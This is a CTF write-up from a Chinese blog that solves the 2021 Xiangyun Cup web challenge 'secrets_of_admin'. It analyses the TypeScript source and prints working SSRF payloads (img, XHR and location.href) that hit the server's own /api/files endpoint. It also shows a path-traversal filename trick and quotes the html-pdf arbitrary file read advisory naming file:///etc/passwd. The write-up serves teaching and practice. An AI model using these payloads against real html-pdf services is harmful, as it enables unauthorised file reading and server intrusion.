[2021祥云杯]secrets_of_admin

最新推荐文章于 2024-04-22 23:18:29 发布
最新推荐文章于 2024-04-22 23:18:29 发布
阅读量274 收藏
点赞数
分类专栏: CTF刷题记录 文章标签: typescript CTF Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/124810661
版权

[2021祥云杯]secrets_of_admin

文章目录

代码分析

附件中有3个ts文件,我们主要分析index.ts,而databash.ts可以用来获取很多信息

按路由来分析

/的POST方式

/的POST方式,主要是传参username和password,调用DB.Login方法

router.post('/', async (req, res) => {
    let { username, password } = req.body;
    if ( username && password) {
        if ( username == '' || typeof(username) !== "string" || password == '' || typeof(password) !== "string" ) {
            return res.render('index', { error: 'Parameters error 👻'});
        }
        let data = await DB.Login(username, password)
        if(!data) {
            return res.render('index', { error : 'You are not admin 😤'});
        }
        res.cookie('token', {
            username: username,
            isAdmin: true 
        }, { signed: true })
        res.redirect('/admin');
    } else {
        return res.render('index', { error : 'Parameters cannot be blank 😒'});
    }
})

而在这个DB.Login方法中会将传入的参数和数据库中的信息进行对比

static Login(username: string, password: string): Promise<any> {
        return new Promise((resolve, reject) => {
            db.get(`SELECT * FROM users WHERE username = ? AND password = ?`, username, password, (err , result ) => {
                if (err) return reject(err);
                resolve(result !== undefined);
            })
        })
    }

/admin的GET方式

/admin的GET方式,调用checkAuth方法

router.get('/admin', checkAuth, async (req, res) => {
    let token = req.signedCookies['token'];
    try {
        const files = await DB.listFile(token.username);
        if (files) {
            //将信息写入cookie
            res.cookie('token', {username: token.username, files: files, isAdmin: true }, { signed: true })
        }
    } catch (err) {
        return res.render('admin', { error: 'Something wrong ... 👻'})
    }
    return res.render('admin');
});

这个checkAuth方法的意思直白,就是检查username是否为superuser,意思就是禁止用户superuser

const checkAuth = (req: Request, res:Response, next:NextFunction) => {
    let token = req.signedCookies['token']
    if (token && token["username"]) {
        if (token.username === 'superuser'){
            next(createError(404)) // superuser is disabled since you can't even find it in database :)
        }
        if (token.isAdmin === true) {
            next();
        }
        else {
            return res.redirect('/')
        }
    } else {
        next(createError(404));
    }
}

检查username之后,会去获取token,接下来调用listFile方法,这个listFile方法,会根据传入的usename查询filename和checksum

static listFile(username: string): Promise<any> {
        return new Promise((resolve, reject) => {
            db.all(`SELECT filename, checksum FROM files WHERE username = ? ORDER BY filename`, username, (err, result) => {
                if (err) return reject(err);
                resolve(result);
            })
        })
    }

如果files存在,就将相关信息写入cookie

res.cookie('token', {username: token.username, files: files, isAdmin: true }, { signed: true })

/admin的POST方式

调用checkAuth方法禁止用户superuser

获取content,并且有waf,过滤了相关的关键词

router.post('/admin', checkAuth, (req, res, next) => {
    //获取content
    let { content } = req.body;
    //对content进行过滤,不允许为空,包含< > / script on 
    if ( content == '' || content.includes('<') || content.includes('>') || content.includes('/') || content.includes('script') || content.includes('on')){
        // even admin can't be trusted right ? :)  
        return res.render('admin', { error: 'Forbidden word 🤬'});
    } else {

然后将content放进html模板

else {
        //将content放进html模板中
        let template = `
        <html>
        <meta charset="utf8">
        <title>Create your own pdfs</title>
        <body>
        <h3>${content}</h3>
        </body>
        </html>
        `

调用uuid()随机生成一个pdf,将这个pdf文件放在./files目录下

try {
            //随机生成一个pdf,然后将其送到files目录下
            const filename = `${uuid()}.pdf`
            pdf.create(template, {
                "format": "Letter",
                "orientation": "portrait",
                "border": "0",
                "type": "pdf",
                "renderDelay": 3000,
                "timeout": 5000
            }).toFile(`./files/${filename}`, async (err, _) => {
                if (err) next(createError(500));

调用getCheckSum方法,这个getCheckSum方法的作用是生成一段随机数

const getCheckSum = (filename: string): Promise<string> => {
    return new Promise((resolve, reject) => {
        const shasum = crypto.createHash('md5');
        try {
            const s = fs.createReadStream(path.join(__dirname , "../files/", filename));
            s.on('data', (data) => {
                shasum.update(data)
            })
            s.on('end', () => {
                return resolve(shasum.digest('hex'));
            })
        } catch (err) {
            reject(err)
        }
    })
}

根据filename生成随机数之后,又会将文件名和随机数一起存放到数据库中superuser用户所属下

在这里插入图片描述

/api/files的GET方式

首先判断remoteAddress是否为127.0.0.1,然后获取参数username , filename, checksum,利用DB.Create将username , filename, checksum写入数据库

router.get('/api/files', async (req, res, next) => {
    if (req.socket.remoteAddress.replace(/^.*:/, '') != '127.0.0.1') {
        return next(createError(401));
    }
    //参数赋值
    let { username , filename, checksum } = req.query;
    if (typeof(username) == "string" && typeof(filename) == "string" && typeof(checksum) == "string") {
        try {
            //将username,filename,checksum写入数据库 
            await DB.Create(username, filename, checksum)
            return res.send('Done')
        } catch (err) {
            return res.send('Error!')
        }
    } else {
        return res.send('Parameters error')
    }
});

/api/files/:id的GET方式

获取token,然后禁止superuser用户,调用DB.getFile方法去数据库中的files表查找filename,然后去访问这个文件,注意这里的文件路径是通过path.join进行拼接的,所以我们完全可以通过路径穿越去获取别的文件

router.get('/api/files/:id', async (req, res) => {
    let token = req.signedCookies['token']
    if (token && token['username']) {
        //禁止superuser用户使用
        if (token.username == 'superuser') {
            return res.send('Superuser is disabled now');   
        }
        try {

            //调用getFile方法去数据库中files表查找filename
            let filename = await DB.getFile(token.username, req.params.id)
            if (fs.existsSync(path.join(__dirname , "../files/", filename))){
                //访问该文件
                return res.send(await readFile(path.join(__dirname , "../files/", filename)));
            } else {
                return res.send('No such file!');
            }
        } catch (err) {
            return res.send('Error!');
        }
    } else {
        return res.redirect('/');
    }
});

database.ts

通过查看这个文件,我们可以得到很多有用的信息

数据库中有两个表usersfiles,还有表中的信息,比如admin的密码

INSERT INTO users (id, username, password) VALUES (1, 'admin','e365655e013ce7fdbdbf8f27b418c8fe6dc9354dc4c0328fa02b0ea547659645');

flag信息在files表中,以及其对应的checksum也可以知道

INSERT INTO files (username, filename, checksum) VALUES ('superuser','flag','be5a14a8e504a66979f6938338b0662c');`);

信息处理

我们将得到的信息进行整合

  1. 通过数据库中admin的密码可以登录

  2. admin的GET方式可以将相关信息写入cookie,但是不允许superuser用户

  3. admin的POST方式可以传content,然后将content放入html代码中;然后生成pdf和对应的checksum随机数,并将filename和checksum存入数据库中files表superuser用户所属

  4. /api/files的GET方式只允许本机127.0.0.1访问,可以往files表中写数据,不受限制

  5. /api/files/:id可以访问从数据库中查filename,禁止superuser用户

  6. 我们想要的flag是superuser所属

通过admin的POST方式打SSRF,通过api/files往files中写数据,写的数据中filename最终可以执行flag

解题方法

登录

admin
e365655e013ce7fdbdbf8f27b418c8fe6dc9354dc4c0328fa02b0ea547659645

在这里插入图片描述

因为对content进行了过滤,所以使用content[]进行绕过

在这里插入图片描述

这里的文件名称因为是UNIQUE,所以不能为flag

在这里插入图片描述

但是因为使用的是路径拼接,所以可以使用各种方法来进行绕过

./flag
ee/../flag
../files/flag

通过img进行ssrf

这里理解的是img标签会把src中的链接作为图片链接去自动加载,所以就相当于进行了网页请求

8888端口是因为从源码中,可以看到服务在8888端口上

在这里插入图片描述

<img src="http://127.0.0.1:8888/api/files?username=admin&filename=./flag&checksum=555" />

访问api/files/555,下载555文件,得到flag

在这里插入图片描述

任意文件读取

html-pdf库存在一个任意文件读取:

html-pdf before version 3.0.1 is vulnerable to Arbitrary File Read. The package fails to sanitize the HTML input, allowing attackers to exfiltrate server files by supplying malicious HTML code. XHR requests in the HTML code are executed by the server. Input with an XHR request such as request.open(“GET”,“file:///etc/passwd”) will result in a PDF document with the contents of /etc/passwd.

<script>
var xhr = new XMLHttpRequest();xhr.open("GET", "http://127.0.0.1:8888/api/files?username=admin&filename=./flag&checksum=123", true);xhr.send();
</script>

local.href

content[]=<script>location.href="http://127.0.0.1:8888/api/files?username=admin&filename=../files/flag&checksum=333";</script>

参考链接

  1. 祥云杯2021 Web复现_bfengj的博客-CSDN博客
  2. 祥云杯2021web writeup_Ank1e的博客-CSDN博客
  3. [2021祥云杯]secrets_of_admin writeup + TypeScript看看_shu天的博客-CSDN博客
Sk1y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
_OceanofPDF.com_Smarter_Faster_Better__The_Secrets_of_Bein_-_Charles_Duhigg.pdf
03-27
Smarter_Faster_Better_
[2021祥云]secrets_of_admin writeup + TypeScript看看
ShenZ的博客
04-04 2356
[2021祥云]secrets_of_admin writeup + TypeScript看看思路: > `admin`路由中:content传入一个src属性的标签触发SSRF并访问`api/files`路由,利用`/api/files`在files表中为admin用户创建一个flag文件,然后通过`/api/files/:id`路由来读取该文件。 相关漏洞: >1.src属性的标签在html中可以自动触发,或者说是HTML转PDF时,HTML里面的图片资源被自动加载进来 >2.includes()方
祥云2021 Web复现
feng的博客
08-25 1802
前言 正好buuctf上放了那三道js的题目,就正好复现了一下,学习学习。 cralwer_z 有注册登录,更新个人信息还有爬虫的功能。但是想使用爬虫功能会受到限制: if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) { return res.json({ message: "Sorry but our remote oss server is under mainte
祥云2021web writeup
hezhing
08-27 2783
太菜了,一个web都没做出来。接下来是复现。好好学习一下大佬们的姿势,也记录一下。 参考师傅们的wp,网上有的,侵权删。
祥云题解
合天网安学院
08-25 2090
原创稿件征集 邮箱:[email protected] QQ:3200599554 黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析,稿件通过并发布还能收获200-800元不等的稿酬。 # bad_cat战队WRITEUP 一、 战队信息 战队名称:bad_cat 战队排名:6 二、 解题情况 三、 解题过程 web **1、**ezyii 网上搜yii的1day https://xz.aliyun.com/t/9948#toc-6 思路类似于第四条链子 exp: <?p.
祥云2022 writeup
渗透测试研究中心
11-02 1785
0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞util ,最后好像没用到检查程序,发现apache的common−collections4,而且其反序列化利用类未被Patch一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打考点发现就是cc4附上文章外加spring−ech网上有现成的...
secrets_of_the_oracle_database
09-08
secrets_of_the_oracle_database
Secrets_for_All_the_Things:The_Injection_of_Secrets_for_Every
08-29
Secrets_for_All_the_Things:The_Injection_of_Secrets_for_Every_Application_in_Your_Cloud-Agnostic_Environment 安全 APT 业务风控 企业安全 安全人才
The_SECRETS_OF_POWER_NEGOTIATING_-_ROGER_DAWSON2.pdf
04-29
商务谈判中采用怎样的说话逻辑,如何再谈判之前进行有条理的准备。此书是一点一点粘贴复制的,并非扫描版。
Undocumented_Secrets_of_MATLAB_Java_Programming.part3
03-20
Undocumented_Secrets_of_MATLAB_Java_Programming.part3 Undocumented_Secrets_of_MATLAB_Java_Programming 第3部分(共3部分) http://undocumentedmatlab.com/books/matlab-java This book shows how using ...
《前端面试题》- TypeScript - TypeScript的优/缺点
小张微说的博客
04-22 5754
问题 简述TypeScript的优/缺点 答案 优点 增强了代码的可读性和可维护性 包容性,js可以直接改成tsts编译报错也可以生成js文件,兼容第三方库,即使不是ts编写的 社区活跃,完全支持es6 缺点 增加学习成本 增加开发成本,因为增加了类型定义 需要编译,类型检查会增加编译时长,语法和类型系统复杂的话时间特别特别长 eval和new Function()这种操作类型系统管不到 ...
node-v4.8.6-win-x64.zip
05-07
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
基础运维技能(下)md格式笔记
05-07
基础运维技能(下)md格式笔记
node-v8.1.2-linux-armv7l.tar.xz
05-07
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
黑马程序员 C语言学习笔记
05-07
持续更新
PCL-1.14.1-AllInOne-msvc2022-win64+pdb-msvc2022-win64
05-07
PCL-1.14.1-AllInOne-msvc2022-win64+pdb-msvc2022-win64
DSmall商城系统源代码
最新发布
05-07
PC商城系统源码
secrets_client,get_secret_value_response,SecretId=secret_name
06-13
这是使用 AWS SDK for Python (Boto3) 获取 AWS Secrets Manager 中的 secret 的代码行。其中,`secrets_client` 是一个 AWS Secrets Manager 的 client 对象,用来执行获取 secret 的操作;`SecretId` 参数指定了要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值